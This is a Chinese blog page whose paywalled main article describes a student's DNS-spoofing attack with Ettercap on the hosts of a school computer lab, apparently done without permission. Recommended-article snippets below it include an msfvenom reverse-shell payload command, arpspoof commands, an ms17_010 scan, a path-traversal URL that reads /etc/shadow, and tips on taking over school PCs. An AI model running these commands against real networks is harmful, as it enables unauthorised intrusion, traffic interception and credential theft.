在学校机房进行的一次内网渗透(DNS欺骗)

最新推荐文章于 2025-06-24 16:47:31 发布
原创 最新推荐文章于 2025-06-24 16:47:31 发布 · 1.4w 阅读 · 102 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#dns #kali linux #内网渗透 #DNS欺骗

       上个星期的课上林老板讲到了很多年前的钓鱼网站原理,今天心血来潮突然想试试,就没有好好听课了哈哈哈哈。(求林老板别挂我科大笑

小白一只,求大牛们勿喷,有不对的地方请帮忙指正。


一、系统环境

  • Kali Linux 2.0 (前身是Backtrack系列):著名的渗透测试系统,集成了很多专业的渗透工具
  • Ettercap 0.8.2 :一款强大的网络嗅探工具,可以进行ARP欺骗,DNS劫持,中间人攻击等等
  • 靶机: Windows 7系统,172.21.134.0/255网段内所有主机

二、准备阶段

1.首先,把内网中全部的活跃主机扫描出来。
最低0.47元/天 解锁文章

200万优质内容无限畅学
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
Get Offer —— 渗透测试岗试题汇总(Web相关知识点)
Boom!脑洞大爆炸的博客
07-21 6076
一篇文章了解Web知识点
某校园内网渗透测试
qq_28624871的博客
05-10 4030
信息收集   一、基础信息 目标系统是windows, 服务层有IIs6.0,Apache-Web-Server, 支撑层有ASP.NET,ASP,jQuery,VisualSVN,PHP5.2.6   二、端口开放情况: 利用goby对ip进行扫描,使用nmap工具也同样能扫出所有开放的端口   三、资产探测: 结合goby和nmap扫描的端口情况,手工探测了下,发现总共有5个web应用,以及开放了MySQL、RDP服务。 端口 应用 运行环境 备注 501 WEB:xxxxxxx网络课
渗透学校计算机室,内网渗透技术之渗透学校内网过程 -电脑资料
weixin_42510453的博客
07-04 610
本文重点讲述内网渗透提权部分,对于WEBSHELL不在描述,从本站的角度来看,存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。先来看看目录能穷举出来哪些东西。先看程序目录,很平常么。没现有SU和MYSQL之类的信息。E:盘可以浏览F:盘可以浏览本站ASPX 类型网站,使用的是MSSQL数据库。显示密码不是最高权限的用户,就是是个DB用户提权也不能马上到手。再翻翻别的站点,目录可以...
手把手教你如何进行内网渗透:从零基础到实战突破(非常详细)从零基础入门到精通,收藏这篇就够了
最新发布
Python_0011的博客
06-24 714
内网安全?早就不是摆设了。谁还跟你玩传统的“进来看看”?现在是刺刀见红的巷战!数据泄露?年年创新高,背后都是内网被捅成了筛子。别扯什么“最新攻防技术”,直接上干货,教你从零开始,把内网搅个底朝天,也让防御方长点记性!
一次学校AVCON系统的渗透
大方子
07-21 1213
起初就是想扫下,内网的IIS服务器,看看内网是否存在put漏洞的IIS服务器。 出来一堆的结果就顺手点了下。 发现目标存在任意文件下载,就把系统的shadow文件给下载了回来 http://xxxxxxx/download.action?filename=../../../../../../etc/shadow 想着直接解密登录,但是后来发现root的密码解不开...
关于学校网的渗透与入侵
hesphoros的个人博客
02-11 2945
学校漏洞扫描(不进行任何非法用途)
计算机课入侵学校电脑,有关学校机房(上电脑课的那种),怎么获得管理员权限?...
weixin_42498108的博客
07-11 1550
。。。搞破坏啊呵呵 我喜欢学校的电脑如果限制了你权限的话 估计是硬件限制的了 所以是驱动级的 一旦开机就完蛋就进入了限制模式了 所以要在还没进去系统的时候就破准备个U盘 上百度搜索 U盘一键装系统 把U盘转换成装系统用的移动硬盘(怎么转换官方有图文教程)到了学校 把U盘插上去 开电脑 马上看着屏幕 因为开机的时候他会提示你进入一个叫BIOS的东西应该按什么键的 所以你要超认真的看 他告诉你要按什么...
螣龙安科笔记:内网渗透测试(三)
katekatezzzzz的博客
05-27 1575
经过前两篇文章的介绍,相信大家对于内网渗透测试的一些基础知识已经有了足够的了解,这篇文章就将带你一起来了解内网渗透测试的全过程。 (四)内网渗透流程 1.渗透工具准备 1.1扫描工具 1.1.1主动扫描工具 web应用漏洞扫描器:用于web项目的安全测试工具,扫描网站所有url,自动测试是否存在各种类型的漏洞。如:AWVS、appscan 综合漏洞扫描器:集合了多种功能的漏洞扫描器。如Fux iscanner,具有如下功能:漏洞检测和管理,验证测试程序,IT资产发现和管理,端口扫描器,子域扫描器
网络安全渗透测试——名词解释
weixin_43778463的博客
10-12 3946
常用术语解释
实战|渗透学校内网服务器
zhangge3663的博客
02-01 6122
”黑“掉自己的学校,可能是大多数黑阔们学生时代共同的执念。 前言: 心血来潮,突然想看看学校有没有能用永恒之蓝打下来的机器,顺便来一波内网渗透,想想上一次测试还是刚爆出永恒之蓝的利用工具的时候,那时候msf都还没整合进去,现在直接就能用msf方便多了。 信息收集: 已知 10.10.10.0/24 为学校各种服务器使用的IP 使用MSF中的批量ms17_010验证模块: msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxili.
Qt下载安装及配置教程(非常详细),从零基础入门到精通,看完这一篇就够了
Innocence_0的博客
08-19 5047
下载开源版往下滑,下载Qt在线安装程序它已经检测出我的是windows系统,直接点击download就好。如果是其它的系统,需要找到对应自己系统的安装包。然后跟网速有关,等一会就会自动下载等待下载完成,双击.exe文件,就可以进行安装。首先就是登录qt账户,如果没有可以自行注册一个。然后选择个人用户,之后点击下一步进行安装。如果没有报错,那继续往下:这一步是问你对qt有什么改善的建议,我这里直接选择没有,然后继续进行下一步。
kali内网渗透小技巧
m0_55017965的博客
03-29 3263
基础知识点: 重点:让kali和其他电脑连接在同一个内网上 arpspoof:arp断网攻击 1.ifconfig输入,观察自己Kali内网IP 2.查询与自己kali处于一个内网的IP:fping -asg +ip地址 3.攻击任何一台属于内网的主机 4.arpspoof -i eth0 -t ip地址 目标网关(可以自己计算) 另外,还可以进行目标监听,知道对方在访问什么图片,网址,一切归功于arp协议的漏洞。 ...
如何通过计算机侵入学校网络,如何进行局域网入侵
weixin_39786341的博客
06-21 8281
局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真通信服务等功能,那么如何进行局域网入侵呢?今天就来和大家一起看看局域网入侵方法。入侵局域网电脑方法一1、 下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。 ...
内网渗透Kali三步实现内网ARP欺骗
午夜安全
09-21 3179
内网渗透Kali三步实现内网ARP欺骗 声明:本篇文章仅限用于学习信息安全技术,请勿用于非法途径! 1.1双向欺骗 攻击者(kali):192.168.1.105 目标机器(已取得授权):192.168.1.101 网关:192.168.1.1 kali欺骗目标机器说自己是192.168.1.1,同时欺骗网关说自己是192.168.1.101。 命令:arpspoof –i eth...
kali内网渗透学习笔记
goodhu的博客
03-09 2287
kali内网渗透学习笔记 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=33333 -f exe x> /root/桌面/test1.exe LHOST是主机ip ,LPORT是自己设置的端口号 使用msfconsole监听木马(依次输入下列命令) use exp...
Kali渗透-ARP断网攻击与监听
热门推荐
道阻且长,行则将至
02-29 4万+
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助Kali Linux系统内置的 nmap、arpspoof、driftnet、ettercap 等渗透测试工具对局域网内(同WIFI下)同一网段的PC主机、手机进行 ARP 欺骗和 流量监听,实现对目标主机/手机的断网攻击、图片窃取、密码监听等攻击目的。 环境说明 主机 IP地址 Kali Linu...
教新手入侵内网的思路
10-03 2322
<br /> 简单内网渗透刺探命令:<br />  1.ipconfig /all<br />  //可以查看到当前网卡配置信息,包括所属域以及IP段<br />  这个命令可以看到:<br /> <br />    主机名字---shwdm,<br />    IP--192.168.103.8,<br />    网关IP---192.168.103.10,<br />    DNS 域名解析地址IP---192.168.100.1,<br />    主WINS服务器IP---10.0.22.5<br
近源渗透从监控系统到机房再到教育局网络安全
2301_79475922的博客
09-02 819
监控室的位置居花某所知是在1楼的位置,每次放学都会路过,但是记不清是几号了,微机室的位置是在2楼,同样记不清号是20几了,而1楼和2楼同样分布有大量的教室和办公室,所以网络分布还是很杂的,但同时这两个也是比较好分辨的,办公室的计算机通常来说没人用会关机,教室里就更不用说了上面花某也说过每个教室联网的可能就只有一个电子黑板了,而放学后会关机下网,所以说除去办公室和教室放假已下网的设备,像监控室和服务器这类上网设备还是比较简单扫出来的。没胆量也违法,所以只能搞近源。也是最麻烦的,也是我拖了这么久的主要原因。
学校机房作业管理系统的构架与功能
学校机房作业管理系统是一种专门用于学校机房环境中的计算机软件系统,旨在高效地管理学生在机房完成的作业。该系统是采用ASP(Active Server Pages)技术结合Access数据库和Serv-U FTP服务器软件而构建的,以实现...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值